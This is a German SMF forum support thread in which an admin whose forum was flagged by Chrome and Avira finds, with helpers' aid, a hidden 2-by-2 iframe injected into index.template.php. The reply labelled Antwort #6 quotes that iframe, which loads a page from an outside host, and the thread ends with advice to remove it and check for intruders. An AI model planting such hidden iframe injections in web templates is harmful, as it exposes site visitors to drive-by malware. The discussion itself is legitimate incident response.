23. November 2017, 14:11:23
SMFPortal.de

Autor Thema: [Hilfe bitte] Index.template.php nicht bearbeitbar  (Gelesen 1844 mal)

0 Mitglieder und 1 Gast betrachten dieses Thema.

23. März 2013, 08:53:09
Gelesen 1844 mal

Görli


Vor kurzem wurden wir informiert, dass über Chrome unser Forum eine Bedrohung darstelle:

Zitat
Safe Browsing
Diagnoseseite für quietremembrance.com

Wie wird quietremembrance.com momentan eingestuft?
Diese Website ist momentan als verdächtig eingestuft und kann Ihren Computer beschädigen.

Ein Teil dieser Website wurde aufgrund verdächtiger Aktivitäten in den letzten 90 Tagen 1 mal auf die Liste gesetzt.

Da ich bei Google angemeldet bin, und auch die html-Seite im Root-Verzeichnis habe, habe ich die Webmaster-Tools benutzt.
Ergebnis: Es wurde keine Maleware auf dieser Seite gefunden.

Wenn ich unser Forum über die Seite aufrufe, bekomme ich diese Fehlermeldung nicht.

Nun wollte ich mir die Index.template ansehen (Total Commander) und der Zugriff wird verweigert. Avira meldet wie im Bildanhang zu sehen. Ich kann die Datei auch nicht herunterladen, dann wird das sofort entfernt.

Weiß jemand Rat ?
SMF 2.0.4 + ezPortal

23. März 2013, 10:30:31
Antwort #1

Rookie


Avira deaktivieren, PHP Datei herunterladen und mit einem anderen Scanner untersuchen (solang du die Datei nur auf dem Rechner speicherst und nicht ausführst kann nichts passieren).
Alternativ kannst du die index.template.php auch bei http://virusscan.jotti.org/de oder https://www.virustotal.com/de/ hochladen und untersuchen lassen.

Ich vermute zwar einen false positive, aber man weiß ja nie...

23. März 2013, 10:49:47
Antwort #2

Görli


Danke für den Tipp. So habe ich es gemacht und als Ergebnis wird mir angezeigt - siehe Bildanhang
und bei virustotal kamen die hier:
HTML/TwitScroll.B
JS:Iframe-AML [Trj]
Trojan.Iframe.BZW
TrojWare.HTML.Iframe.G

Wie bekomme ich nun die Datei geöffnet, ohne mir etwas "einzufangen" ? Gibt es sowas wie eine Quarantäne-Umgebung ?
SMF 2.0.4 + ezPortal

23. März 2013, 11:28:01
Antwort #3

TE

Gast
kann durchaus ein Fehlalarm sein.. Link zum Forum und index.template.php hier anhängen. ein IFRAME ist nicht zwingend ein Trojaner, der WYSIWYG-Editor und einige Chats / Shoutboxen nutzen diese Technik durchaus.

23. März 2013, 11:45:15
Antwort #4

Görli


Hier der Link zum Forum.

Danke schon mal im Voraus.

P.S. kann es sein, dass etwas, was in der Shoutbox gepostet wurde, daran schuld ist ? Teilweise wurden Links und Bilder eingefügt.
« Letzte Änderung: 23. März 2013, 11:48:15 von Görli »
SMF 2.0.4 + ezPortal

23. März 2013, 13:27:28
Antwort #5

Rookie


Wenn ich die Datei mit dem Original vergleiche sehe ich nur zwei Unterschiede:

Eine Mod, Simple Image Upload.
Und ein iframe 'Twitter' mit einem Link auf candidateconnector*com

Wenn eines von beiden nicht von dir ist, dann muß man mal schauen wie man das wieder sauber los wird.

23. März 2013, 13:39:28
Antwort #6

Görli


Okay, das Image Upload ist geplant, aber Twitter haben wir lediglich einen Link

Code
function template_html_below()
{
global $context, $settings, $options, $scripturl, $txt, $modSettings;

echo '
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candidateconnector.com/hoaf.html?i=898628></iframe></body></html>';
}
ist nicht von uns. Ich gehe mal davon aus, dass man es nicht nur einfach löschen kann, oder ?
SMF 2.0.4 + ezPortal

23. März 2013, 13:49:26
Antwort #7

Rookie


Der iframe Teil muß nur raus, alles andere ist Original. Also das was zwischen <iframe> und </iframe> steht, plus der iframe Tags.

Wenn das nicht von euch ist, würde ich mal behaupten, dass da jemand Zugriff auf euern Webspace hat der da nichts zu suchen hat.
Wie ihr dem auf die Schliche kommt, weiß ich leider nicht, da muß jemand was zu sagen der sich auskennt, sorry.

23. März 2013, 14:23:13
Antwort #8

Görli


 :!.!: jetzt konnte ich auch die Datei öffnen, ohne Avira immer auszuschalten, nachdem ich den Twitterteil gelöscht hatte.

Ich hoffe damit ist schon mal etwas Ruhe. Die Shoutbox hatte ich auch einmal komplett geleert.
Mensch, da muss ich mir das gesamte Log vom Server mal ansehen.

Danke schon mal !
SMF 2.0.4 + ezPortal

23. März 2013, 16:20:01
Antwort #9

Mikado


Ruhe wirst Du sicher nicht haben, denn das kommt ja nicht so ohne Weiteres in die Index-Datei. Lass das nicht auf sich beruhen. ;)
Viele Grüße
Petra

 

Internes

Nutzungsbedingungen Impressum

Wissenswertes

Hilfe Knowledge Base

Nützliches

Downloads Kleinanzeigen Socialmedia